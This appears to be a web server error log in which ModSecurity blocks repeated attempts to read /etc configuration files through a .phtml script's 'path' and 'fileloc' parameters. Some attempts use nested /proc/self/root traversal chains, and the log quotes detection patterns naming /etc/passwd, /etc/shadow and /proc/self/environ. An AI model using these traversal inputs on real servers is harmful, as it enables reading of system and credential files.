[Thu Mar 19 11:45:21.261921 2026] [:error] [pid 27293:tid 140411699963648] [client 57.141.18.110:36474] [client 57.141.18.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMAf-YZRR_7pZ7nDKSHAAAA8U"]
[Thu Mar 19 11:45:21.298951 2026] [:error] [pid 15826:tid 140411599251200] [client 57.141.18.11:36476] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMAeoXxyEfFpUF8f8UOAAAAVE"]
[Thu Mar 19 11:45:21.922149 2026] [:error] [pid 14269:tid 140411607643904] [client 57.141.18.75:36486] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMAQbLMZ6AikZjR9VjxAAAABA"]
[Thu Mar 19 11:45:22.340053 2026] [core:alert] [pid 19093:tid 140411565680384] [client 57.141.18.75:36492] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 11:45:22.512815 2026] [:error] [pid 15826:tid 140411641214720] [client 57.141.18.89:36494] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMAuoXxyEfFpUF8f8UOQAAAUw"]
[Thu Mar 19 11:45:22.623264 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.241.31:47130] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMAsdf6f5d65gmYZR-PQAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:45:23.547865 2026] [:error] [pid 17653:tid 140411658000128] [client 57.141.18.86:36526] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMA8df6f5d65gmYZR-PwAAAso"]
[Thu Mar 19 11:45:23.878915 2026] [:error] [pid 17887:tid 140411666392832] [client 57.141.18.109:36504] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMAwkwaGbbGflqUZDJ9gAAAMk"]
[Thu Mar 19 11:45:24.422828 2026] [:error] [pid 17653:tid 140411599251200] [client 57.141.18.49:36546] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMBMdf6f5d65gmYZR-QgAAAtE"]
[Thu Mar 19 11:45:24.892144 2026] [:error] [pid 14269:tid 140411741927168] [client 57.141.18.56:36560] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMBAbLMZ6AikZjR9VjxwAAAAA"]
[Thu Mar 19 11:45:25.326282 2026] [:error] [pid 17653:tid 140411674785536] [client 57.141.18.100:36520] [client 57.141.18.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMBcdf6f5d65gmYZR-RAAAAsg"]
[Thu Mar 19 11:45:26.078820 2026] [:error] [pid 17887:tid 140411733534464] [client 57.141.18.117:36584] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMBgkwaGbbGflqUZDJ-AAAAME"]
[Thu Mar 19 11:45:26.667198 2026] [:error] [pid 17653:tid 140411632822016] [client 57.141.18.18:36570] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMBsdf6f5d65gmYZR-RwAAAs0"]
[Thu Mar 19 11:45:27.071853 2026] [:error] [pid 19093:tid 140411632822016] [client 57.141.18.113:36596] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMB1_V7PWP6ixUYl7DMQAAAo0"]
[Thu Mar 19 11:45:27.090046 2026] [:error] [pid 26799:tid 140411741927168] [client 57.141.18.25:36598] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMB9a6ubjKNq_cu4ZbugAAA0A"]
[Thu Mar 19 11:45:27.693336 2026] [:error] [pid 14269:tid 140411666392832] [client 57.141.18.13:36608] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMBwbLMZ6AikZjR9VjyQAAAAk"]
[Thu Mar 19 11:45:28.075264 2026] [:error] [pid 31803:tid 140411582465792] [client 57.141.18.27:36624] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMCOyqAr6etmhZHNpmxgAAAFM"]
[Thu Mar 19 11:45:28.294656 2026] [:error] [pid 14269:tid 140411674785536] [client 57.141.18.81:36630] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMCAbLMZ6AikZjR9VjygAAAAg"]
[Thu Mar 19 11:45:28.676482 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:53774] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMCOyqAr6etmhZHNpmxwAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:45:29.051299 2026] [:error] [pid 19093:tid 140411691570944] [client 57.141.18.83:36644] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMCV_V7PWP6ixUYl7DMgAAAoY"]
[Thu Mar 19 11:45:29.691332 2026] [:error] [pid 15826:tid 140411733534464] [client 57.141.18.104:36656] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMCeoXxyEfFpUF8f8UPgAAAUE"]
[Thu Mar 19 11:45:31.128769 2026] [:error] [pid 15826:tid 140411725141760] [client 57.141.18.26:36650] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMC-oXxyEfFpUF8f8UPwAAAUI"]
[Thu Mar 19 11:45:31.579950 2026] [:error] [pid 19093:tid 140411548894976] [client 57.141.18.72:36674] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMC1_V7PWP6ixUYl7DNQAAApc"]
[Thu Mar 19 11:45:31.819879 2026] [:error] [pid 17887:tid 140411716749056] [client 57.141.18.93:36704] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMCwkwaGbbGflqUZDJ-gAAAMM"]
[Thu Mar 19 11:45:32.355037 2026] [:error] [pid 26799:tid 140411540502272] [client 57.141.18.116:36716] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMDNa6ubjKNq_cu4ZbvgAAA1g"]
[Thu Mar 19 11:45:32.387899 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:44306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMDMdf6f5d65gmYZR-SwAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:45:32.855062 2026] [:error] [pid 17887:tid 140411607643904] [client 57.141.18.95:36694] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMDAkwaGbbGflqUZDJ-wAAANA"]
[Thu Mar 19 11:45:34.420444 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.14:36722] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMDNa6ubjKNq_cu4ZbvwAAA0I"]
[Thu Mar 19 11:45:34.423451 2026] [:error] [pid 30077:tid 140411641214720] [client 57.141.18.83:36732] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMDfu8EFLIOrSqIput6AAAAkw"]
